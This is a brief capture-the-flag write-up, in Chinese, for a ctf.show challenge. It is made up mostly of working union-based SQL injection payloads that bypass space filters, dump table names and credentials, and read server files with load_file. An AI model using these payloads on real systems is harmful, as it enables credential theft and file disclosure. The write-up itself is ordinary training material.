http://56ea2c93-f022-45c9-b977-3f9e7bb1114a.challenge.ctf.show/secret.php/?c=3
显示了一个文件
访问一下
有注入点,整形注入,直接上
库名:
-1/**/union/**/select/**/database()#
表名:
-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database()#
字段名:
-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_schema=database()/**/and/**/table_name='content'#
内容:
-1/**/union/**/select/**/group_concat(username,password)/**/from/**/content#
叫看一下secret,抓下包
存在另外一个文件,直接读
也可以直接读取一下secret.php源码:
-1/**/union/**/select/**/load_file('/var/www/html/secret.php')
发现还有 /real_flag_is_here这个文件,
直接读一下/real_flag_is_here
-1/**/union/**/select/**/load_file('/real_flag_is_here')
获得flag:ctfshow{84bd6c4d-7a2b-4937-8cc0-52f87f029351}